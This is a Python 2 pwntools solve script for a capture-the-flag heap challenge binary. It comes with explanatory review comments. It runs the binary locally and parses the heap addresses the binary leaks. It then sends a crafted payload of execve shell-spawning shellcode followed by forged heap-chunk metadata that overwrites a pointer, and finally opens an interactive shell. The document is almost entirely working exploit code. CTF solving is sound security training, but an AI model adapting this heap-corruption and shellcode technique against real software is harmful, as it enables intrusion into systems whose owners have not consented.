#!/usr/bin/env python2

from pwn import *

# Setup goodies
#
# Local solve script for the CTF challenge binary named below (pwntools).
# Python 2 throughout (see the shebang): every string here is a byte
# string, so the payload bytes are sent unmodified.  Under Python 3 /
# current pwntools the tube calls would need bytes literals instead.
# Targets i386 Linux so that p32() packs 4-byte little-endian values.
context(os = 'linux', arch = 'i386')
# NOTE(review): `elf` is never referenced below; kept only for interactive
# inspection of the binary (symbols/sections) from a REPL, presumably.
elf = ELF('./babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c')

# Runs the challenge binary as a local child process (not a remote service).
r = process('./babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c')

# Skip header
# Discard the banner up to and including the line ending in "address.".
r.recvuntil('address.\n')

# Receive the heap locations
# The binary prints 20 lines each containing "loc=<hex>]"; the hex text
# between "loc=" and "]" is parsed into `addrs` in print order, and the
# remainder of each line is discarded.  int(..., 16) accepts an optional
# "0x" prefix, so either form of the printed address works.
addrs = []
for n in range(20):
    r.recvuntil('loc=')
    loc = r.recvuntil(']')[:-1]
    addrs.append(int(loc, 16))
    r.recvline()

# 24 bytes of raw i386 machine code, taken as-is.  NOTE(review): it
# appears to be a standard execve shell-spawn stub — confirm by
# disassembling rather than trusting the variable name.
shellcode = "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"

# Payload layout (total 2 + 8 + 250 + 12 = 272 bytes):
#   "\xeb\x08"   2-byte short relative jump (+8), presumably skipping the
#                8 NUL bytes that follow so execution lands on `shellcode`
#   "\x00"*8     8 bytes of NUL padding
#   shellcode    padded with NULs to exactly 250 bytes
#   3 x p32(..)  three little-endian 32-bit words hard-coded for this
#                specific binary: 0xfffffffd (a small negative value),
#                0x0804C004-8, and the 11th address the binary printed.
# NOTE(review): the trailing words look like forged heap-chunk metadata
# (a size field followed by two pointers) aimed at the allocator's
# bookkeeping — confirm against the binary.  0x0804C004 and the index 10
# into `addrs` are binary-specific and must be re-derived if the
# challenge file (or its build) changes; nothing here validates them.
sc = "\xeb\x08" + '\x00'*8 + shellcode.ljust(250, '\x00') + p32(0xfffffffd) + p32(0x0804C004-8) + p32(addrs[10])
r.send(sc)

# GO!
# Drain whatever the process has already written, then hand the tube to
# the terminal so the user can interact with the resulting process.
r.clean()
r.interactive()
